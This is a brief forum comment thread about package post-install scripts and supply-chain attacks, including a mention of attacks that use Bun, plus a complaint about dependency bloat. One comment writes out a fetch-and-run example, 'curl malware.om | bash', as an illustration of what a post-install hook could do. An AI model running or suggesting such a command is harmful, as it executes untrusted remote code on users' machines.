• ugjka@lemmy.ugjka.net
      link
      fedilink
      English
      arrow-up
      8
      ·
      9 hours ago

      Tbf, it is run in package post install section so it could be anything even the typical “curl malware.om | bash”. There is a new wave of attacks now pulling things in with Bun which i guess is similar thing to NPM

      • kboy101222@sh.itjust.works
        link
        fedilink
        English
        arrow-up
        7
        ·
        8 hours ago

        I’m just a web guy whose tired of installing 10 xetabytes of 2 line libraries every time I wanna check out anything web related